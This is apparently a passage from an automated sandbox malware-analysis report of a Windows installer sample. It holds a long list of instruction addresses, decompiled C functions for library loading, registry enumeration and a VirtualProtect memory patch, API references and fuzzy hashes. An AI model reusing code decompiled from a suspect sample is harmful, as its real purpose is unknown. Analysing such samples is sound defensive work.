                                                        0x00406c30
                                                        0x00406c32
                                                        0x00406c39
                                                        0x00406c3a
                                                        0x00406c3c
                                                        0x00406c3f
                                                        0x00406c42
                                                        0x00406c45
                                                        0x00406c45
                                                        0x00406c4a
                                                        0x00000000
                                                        0x00406c4a
                                                        0x00406bfb
                                                        0x00406bfe
                                                        0x00406c01
                                                        0x00406c0b
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406ca2
                                                        0x00406ca6
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cac
                                                        0x00406cb0
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cb6
                                                        0x00406cb8
                                                        0x00406cbc
                                                        0x00406cbc
                                                        0x00406cbf
                                                        0x00406cc3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d13
                                                        0x00406d17
                                                        0x00406d1e
                                                        0x00406d21
                                                        0x00406d24
                                                        0x00406d2e
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406d19
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d3a
                                                        0x00406d3e
                                                        0x00406d45
                                                        0x00406d48
                                                        0x00406d4b
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d4e
                                                        0x00406d51
                                                        0x00406d54
                                                        0x00406d54
                                                        0x00406d57
                                                        0x00406d5a
                                                        0x00406d5d
                                                        0x00406d5d
                                                        0x00406d60
                                                        0x00406d67
                                                        0x00406d6c
                                                        0x00000000
                                                        0x00000000
                                                        0x00406dfa
                                                        0x00406dfa
                                                        0x00406dfe
                                                        0x0040719c
                                                        0x00000000
                                                        0x0040719c
                                                        0x00406e04
                                                        0x00406e07
                                                        0x00406e0a
                                                        0x00406e0e
                                                        0x00406e11
                                                        0x00406e17
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e1c
                                                        0x00406e1f
                                                        0x00000000
                                                        0x00000000
                                                        0x004069ef
                                                        0x004069ef
                                                        0x004069f3
                                                        0x00407160
                                                        0x00000000
                                                        0x00407160
                                                        0x004069f9
                                                        0x004069fc
                                                        0x004069ff
                                                        0x00406a03
                                                        0x00406a06
                                                        0x00406a0c
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a11
                                                        0x00406a14
                                                        0x00406a14
                                                        0x00406a17
                                                        0x00406a1a
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a20
                                                        0x00406a26
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a2c
                                                        0x00406a2c
                                                        0x00406a30
                                                        0x00406a33
                                                        0x00406a36
                                                        0x00406a39
                                                        0x00406a3c
                                                        0x00406a3d
                                                        0x00406a40
                                                        0x00406a42
                                                        0x00406a48
                                                        0x00406a4b
                                                        0x00406a4e
                                                        0x00406a51
                                                        0x00406a54
                                                        0x00406a57
                                                        0x00406a5a
                                                        0x00406a76
                                                        0x00406a79
                                                        0x00406a7c
                                                        0x00406a7f
                                                        0x00406a86
                                                        0x00406a8a
                                                        0x00406a8c
                                                        0x00406a90
                                                        0x00406a5c
                                                        0x00406a5c
                                                        0x00406a60
                                                        0x00406a68
                                                        0x00406a6d
                                                        0x00406a6f
                                                        0x00406a71
                                                        0x00406a71
                                                        0x00406a93
                                                        0x00406a9a
                                                        0x00406a9d
                                                        0x00000000
                                                        0x00406aa3
                                                        0x00000000
                                                        0x00406aa3
                                                        0x00000000
                                                        0x00406aa8
                                                        0x00406aa8
                                                        0x00406aac
                                                        0x0040716c
                                                        0x00000000
                                                        0x0040716c
                                                        0x00406ab2
                                                        0x00406ab5
                                                        0x00406ab8
                                                        0x00406abc
                                                        0x00406abf
                                                        0x00406ac5
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406aca
                                                        0x00406acd
                                                        0x00406acd
                                                        0x00406acd
                                                        0x00406ad3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406ad5
                                                        0x00406ad8
                                                        0x00406adb
                                                        0x00406ade
                                                        0x00406ae1
                                                        0x00406ae4
                                                        0x00406ae7
                                                        0x00406aea
                                                        0x00406aed
                                                        0x00406af0
                                                        0x00406af3
                                                        0x00406b0b
                                                        0x00406b0e
                                                        0x00406b11
                                                        0x00406b14
                                                        0x00406b14
                                                        0x00406b17
                                                        0x00406b1b
                                                        0x00406b1d
                                                        0x00406af5
                                                        0x00406af5
                                                        0x00406afd
                                                        0x00406b02
                                                        0x00406b04
                                                        0x00406b06
                                                        0x00406b06
                                                        0x00406b20
                                                        0x00406b27
                                                        0x00406b2a
                                                        0x00000000
                                                        0x00406b2c
                                                        0x00000000
                                                        0x00406b2c
                                                        0x00406b2a
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b6c
                                                        0x00406b6c
                                                        0x00406b70
                                                        0x00407178
                                                        0x00000000
                                                        0x00407178
                                                        0x00406b76
                                                        0x00406b79
                                                        0x00406b7c
                                                        0x00406b80
                                                        0x00406b83
                                                        0x00406b89
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8e
                                                        0x00406b91
                                                        0x00406b91
                                                        0x00406b97
                                                        0x00406b35
                                                        0x00406b35
                                                        0x00406b38
                                                        0x00000000
                                                        0x00406b38
                                                        0x00406b99
                                                        0x00406b99
                                                        0x00406b9c
                                                        0x00406b9f
                                                        0x00406ba2
                                                        0x00406ba5
                                                        0x00406ba8
                                                        0x00406bab
                                                        0x00406bae
                                                        0x00406bb1
                                                        0x00406bb4
                                                        0x00406bb7
                                                        0x00406bcf
                                                        0x00406bd2
                                                        0x00406bd5
                                                        0x00406bd8
                                                        0x00406bd8
                                                        0x00406bdb
                                                        0x00406bdf
                                                        0x00406be1
                                                        0x00406bb9
                                                        0x00406bb9
                                                        0x00406bc1
                                                        0x00406bc6
                                                        0x00406bc8
                                                        0x00406bca
                                                        0x00406bca
                                                        0x00406be4
                                                        0x00406beb
                                                        0x00406bee
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00000000
                                                        0x00406e7d
                                                        0x00406e7d
                                                        0x00406e81
                                                        0x004071a8
                                                        0x00000000
                                                        0x004071a8
                                                        0x00406e87
                                                        0x00406e8a
                                                        0x00406e8d
                                                        0x00406e91
                                                        0x00406e94
                                                        0x00406e9a
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c4d
                                                        0x00406c4d
                                                        0x00406c50
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406f8c
                                                        0x00406f90
                                                        0x00406fb2
                                                        0x00406fb5
                                                        0x00406fbf
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406f92
                                                        0x00406f95
                                                        0x00406f99
                                                        0x00406f9c
                                                        0x00406f9c
                                                        0x00406f9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00407049
                                                        0x0040704d
                                                        0x0040706b
                                                        0x0040706b
                                                        0x0040706b
                                                        0x00407072
                                                        0x00407079
                                                        0x00407080
                                                        0x00407080
                                                        0x00000000
                                                        0x00407080
                                                        0x0040704f
                                                        0x00407052
                                                        0x00407055
                                                        0x00407058
                                                        0x0040705f
                                                        0x00406fa3
                                                        0x00406fa3
                                                        0x00406fa6
                                                        0x00000000
                                                        0x00000000
                                                        0x0040713a
                                                        0x0040713d
                                                        0x0040703e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d74
                                                        0x00406d76
                                                        0x00406d7d
                                                        0x00406d7e
                                                        0x00406d80
                                                        0x00406d83
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d8b
                                                        0x00406d8e
                                                        0x00406d91
                                                        0x00406d93
                                                        0x00406d95
                                                        0x00406d95
                                                        0x00406d96
                                                        0x00406d99
                                                        0x00406da0
                                                        0x00406da3
                                                        0x00406db1
                                                        0x00000000
                                                        0x00000000
                                                        0x00407087
                                                        0x00407087
                                                        0x0040708a
                                                        0x00407091
                                                        0x00000000
                                                        0x00000000
                                                        0x00407096
                                                        0x00407096
                                                        0x0040709a
                                                        0x004071d2
                                                        0x00000000
                                                        0x004071d2
                                                        0x004070a0
                                                        0x004070a3
                                                        0x004070a6
                                                        0x004070aa
                                                        0x004070ad
                                                        0x004070b3
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b8
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070be
                                                        0x004070be
                                                        0x004070c2
                                                        0x00407122
                                                        0x00407125
                                                        0x0040712a
                                                        0x0040712b
                                                        0x0040712d
                                                        0x0040712f
                                                        0x00407132
                                                        0x0040703e
                                                        0x0040703e
                                                        0x00000000
                                                        0x00407044
                                                        0x0040703e
                                                        0x004070c4
                                                        0x004070ca
                                                        0x004070cd
                                                        0x004070d0
                                                        0x004070d3
                                                        0x004070d6
                                                        0x004070d9
                                                        0x004070dc
                                                        0x004070df
                                                        0x004070e2
                                                        0x004070e5
                                                        0x004070fe
                                                        0x00407101
                                                        0x00407104
                                                        0x00407107
                                                        0x0040710b
                                                        0x0040710d
                                                        0x0040710d
                                                        0x0040710e
                                                        0x00407111
                                                        0x004070e7
                                                        0x004070e7
                                                        0x004070ef
                                                        0x004070f4
                                                        0x004070f6
                                                        0x004070f9
                                                        0x004070f9
                                                        0x00407114
                                                        0x0040711b
                                                        0x00000000
                                                        0x0040711d
                                                        0x00000000
                                                        0x0040711d
                                                        0x00000000
                                                        0x00406db9
                                                        0x00406dbc
                                                        0x00406df2
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f25
                                                        0x00406f25
                                                        0x00406f28
                                                        0x00406f2a
                                                        0x004071b4
                                                        0x00000000
                                                        0x004071b4
                                                        0x00406f30
                                                        0x00406f33
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f39
                                                        0x00406f3d
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00000000
                                                        0x00406f40
                                                        0x00406dbe
                                                        0x00406dc0
                                                        0x00406dc2
                                                        0x00406dc4
                                                        0x00406dc7
                                                        0x00406dc8
                                                        0x00406dca
                                                        0x00406dcc
                                                        0x00406dcf
                                                        0x00406dd2
                                                        0x00406de8
                                                        0x00406ded
                                                        0x00406e25
                                                        0x00406e25
                                                        0x00406e29
                                                        0x00406e55
                                                        0x00406e57
                                                        0x00406e5e
                                                        0x00406e61
                                                        0x00406e64
                                                        0x00406e64
                                                        0x00406e69
                                                        0x00406e69
                                                        0x00406e6b
                                                        0x00406e6e
                                                        0x00406e75
                                                        0x00406e78
                                                        0x00406ea5
                                                        0x00406ea5
                                                        0x00406ea8
                                                        0x00406eab
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00000000
                                                        0x00406f1f
                                                        0x00406ead
                                                        0x00406eb3
                                                        0x00406eb6
                                                        0x00406eb9
                                                        0x00406ebc
                                                        0x00406ebf
                                                        0x00406ec2
                                                        0x00406ec5
                                                        0x00406ec8
                                                        0x00406ecb
                                                        0x00406ece
                                                        0x00406ee7
                                                        0x00406ee9
                                                        0x00406eec
                                                        0x00406eed
                                                        0x00406ef0
                                                        0x00406ef2
                                                        0x00406ef5
                                                        0x00406ef7
                                                        0x00406ef9
                                                        0x00406efc
                                                        0x00406efe
                                                        0x00406f01
                                                        0x00406f05
                                                        0x00406f07
                                                        0x00406f07
                                                        0x00406f08
                                                        0x00406f0b
                                                        0x00406f0e
                                                        0x00406ed0
                                                        0x00406ed0
                                                        0x00406ed8
                                                        0x00406edd
                                                        0x00406edf
                                                        0x00406ee2
                                                        0x00406ee2
                                                        0x00406f11
                                                        0x00406f18
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00406f18
                                                        0x00406e2b
                                                        0x00406e2e
                                                        0x00406e30
                                                        0x00406e33
                                                        0x00406e36
                                                        0x00406e39
                                                        0x00406e3b
                                                        0x00406e3e
                                                        0x00406e41
                                                        0x00406e41
                                                        0x00406e44
                                                        0x00406e44
                                                        0x00406e47
                                                        0x00406e4e
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00000000
                                                        0x00406e50
                                                        0x00000000
                                                        0x00406e50
                                                        0x00406e4e
                                                        0x00406dd4
                                                        0x00406dd7
                                                        0x00406dd9
                                                        0x00406ddc
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b3b
                                                        0x00406b3b
                                                        0x00406b3f
                                                        0x00407184
                                                        0x00000000
                                                        0x00407184
                                                        0x00406b45
                                                        0x00406b48
                                                        0x00406b4b
                                                        0x00406b4e
                                                        0x00406b51
                                                        0x00406b54
                                                        0x00406b57
                                                        0x00406b59
                                                        0x00406b5c
                                                        0x00406b5f
                                                        0x00406b62
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cc6
                                                        0x00406cc6
                                                        0x00406cca
                                                        0x00407190
                                                        0x00000000
                                                        0x00407190
                                                        0x00406cd0
                                                        0x00406cd3
                                                        0x00406cd6
                                                        0x00406cd9
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cde
                                                        0x00406ce1
                                                        0x00406ce4
                                                        0x00406ce7
                                                        0x00406cea
                                                        0x00406ced
                                                        0x00406cee
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf3
                                                        0x00406cf6
                                                        0x00406cf9
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cff
                                                        0x00406d01
                                                        0x00406d01
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f47
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f4d
                                                        0x00406f50
                                                        0x00406f53
                                                        0x00406f56
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f5b
                                                        0x00406f5e
                                                        0x00406f61
                                                        0x00406f64
                                                        0x00406f67
                                                        0x00406f6a
                                                        0x00406f6b
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f70
                                                        0x00406f73
                                                        0x00406f76
                                                        0x00406f79
                                                        0x00406f7c
                                                        0x00406f80
                                                        0x00406f82
                                                        0x00406f85
                                                        0x00000000
                                                        0x00406f87
                                                        0x00406d04
                                                        0x00406d04
                                                        0x00000000
                                                        0x00406d04
                                                        0x00406f85
                                                        0x004071ba
                                                        0x00000000
                                                        0x00000000
                                                        0x004067e9
                                                        0x004071f1
                                                        0x004071f1
                                                        0x00000000
                                                        0x004071f1
                                                        0x0040703e
                                                        0x00406fc5
                                                        0x00406fc2

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                                        • Instruction ID: 7d50f74d422c9426a2654202d950de31cd619cd826110beab4429d7d99e33e8a
                                                        • Opcode Fuzzy Hash: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                                        • Instruction Fuzzy Hash: F9715671E04229DBDF28CF98C9447ADBBB1FF44305F11806AD856BB281C7389986DF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040202C Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 60%
                                                        			E0040202C(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				void* _t34;
				WCHAR* _t37;
				intOrPtr* _t38;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x42a2d8");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42a2a8 =  *0x42a2a8 +  *(_t39 - 4);
					return 0;
				}
				_t37 = E00402C37(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x3c)) = E00402C37(1);
				if( *((intOrPtr*)(_t39 - 0x18)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t38 = E00406695( *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x3c)));
					if(_t38 == _t32) {
						E004052B0(0xfffffff7,  *((intOrPtr*)(_t39 - 0x3c)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x20)) == _t32) {
							 *_t38( *((intOrPtr*)(_t39 - 8)), 0x400, _t34, 0x40cdac, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x20)));
							if( *_t38() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x1c)) == _t32 && E004038FA( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t37); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                        0x0040202c
                                                        0x0040202c
                                                        0x00402031
                                                        0x00402038
                                                        0x004020f7
                                                        0x00402245
                                                        0x00402245
                                                        0x00402abf
                                                        0x00402ac2
                                                        0x00402ace
                                                        0x00402ace
                                                        0x00402047
                                                        0x00402051
                                                        0x00402054
                                                        0x00402064
                                                        0x00402068
                                                        0x00402070
                                                        0x00402073
                                                        0x004020f0
                                                        0x00000000
                                                        0x004020f0
                                                        0x00402075
                                                        0x00402080
                                                        0x00402084
                                                        0x004020c4
                                                        0x00402086
                                                        0x00402089
                                                        0x0040208c
                                                        0x004020b8
                                                        0x0040208e
                                                        0x00402091
                                                        0x0040209a
                                                        0x0040209c
                                                        0x0040209c
                                                        0x0040209a
                                                        0x0040208c
                                                        0x004020cc
                                                        0x004020e5
                                                        0x004020e5
                                                        0x00000000
                                                        0x004020cc
                                                        0x00402057
                                                        0x0040205f
                                                        0x00402062
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402057
                                                          • Part of subcall function 004052B0: lstrlenW.KERNEL32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                          • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                          • Part of subcall function 004052B0: lstrcatW.KERNEL32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00403233), ref: 0040530B
                                                          • Part of subcall function 004052B0: SetWindowTextW.USER32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade), ref: 0040531D
                                                          • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                          • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                          • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                        • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402068
                                                        • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                        • String ID:
                                                        • API String ID: 334405425-0
                                                        • Opcode ID: e3961a0bc32dc20507236d74e46fa7042790e53cd6742115274889cdc0d07f9d
                                                        • Instruction ID: 1b7e6cc8a89e608973352e39bc6088f07de5daa2050f71ccd5864d961518f39c
                                                        • Opcode Fuzzy Hash: e3961a0bc32dc20507236d74e46fa7042790e53cd6742115274889cdc0d07f9d
                                                        • Instruction Fuzzy Hash: 0321B331900218EBCF216FA5CE4DAAE7A70AF04354F60413BF511B51E1DBBD4951DA6E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004024F2 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 86%
                                                        			E004024F2(int* __ebx, intOrPtr __edx, short* __esi) {
				void* _t9;
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				void* _t22;
				short* _t24;
				void* _t26;
				void* _t29;

				_t24 = __esi;
				_t21 = __edx;
				_t16 = __ebx;
				_t9 = E00402C77(_t29, 0x20019); // executed
				_t22 = _t9;
				_t10 = E00402C15(3);
				 *((intOrPtr*)(_t26 - 0x4c)) = _t21;
				 *__esi = __ebx;
				if(_t22 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x18)) == __ebx) {
						_t13 = RegEnumValueW(_t22, _t10, __esi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyW(_t22, _t10, __esi, 0x3ff);
					}
					_t24[0x3ff] = _t16;
					_push(_t22); // executed
					RegCloseKey(); // executed
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}












                                                        0x004024f2
                                                        0x004024f2
                                                        0x004024f2
                                                        0x004024f7
                                                        0x004024fe
                                                        0x00402500
                                                        0x00402508
                                                        0x0040250b
                                                        0x0040250e
                                                        0x00402885
                                                        0x00402514
                                                        0x0040251c
                                                        0x0040251f
                                                        0x00402538
                                                        0x0040253e
                                                        0x00402540
                                                        0x00402542
                                                        0x00402542
                                                        0x00402521
                                                        0x00402525
                                                        0x00402525
                                                        0x00402549
                                                        0x00402550
                                                        0x00402551
                                                        0x00402551
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
                                                        • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402538
                                                        • RegCloseKey.KERNELBASE(?,?,?,Finishs,00000000,00000011,00000002), ref: 00402551
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: Enum$CloseValue
                                                        • String ID:
                                                        • API String ID: 397863658-0
                                                        • Opcode ID: ceb7b32d921ca444f1fc010657555d0ace05083c01aecd1a6f00f0e4ceb8bccc
                                                        • Instruction ID: caf525ecc09255a736170ff5365d3a7771f075d5505ff7476addd39d58865d97
                                                        • Opcode Fuzzy Hash: ceb7b32d921ca444f1fc010657555d0ace05083c01aecd1a6f00f0e4ceb8bccc
                                                        • Instruction Fuzzy Hash: 4A017171904104EFE7159FA5DE89ABFB6BCEF44348F10403EF105A62D0DAB84E459B69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 100027C2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000405c, 4, 0x40, 0x1000404c); // executed
					 *0x1000405c = 0xc2;
					 *0x1000404c = 0;
					 *0x10004054 = 0;
					 *0x10004068 = 0;
					 *0x10004058 = 0;
					 *0x10004050 = 0;
					 *0x10004060 = 0;
					 *0x1000405e = 0;
				}
				return 1;
			}



                                                        0x100027cb
                                                        0x100027d0
                                                        0x100027e0
                                                        0x100027e8
                                                        0x100027ef
                                                        0x100027f4
                                                        0x100027f9
                                                        0x100027fe
                                                        0x10002803
                                                        0x10002808
                                                        0x1000280d
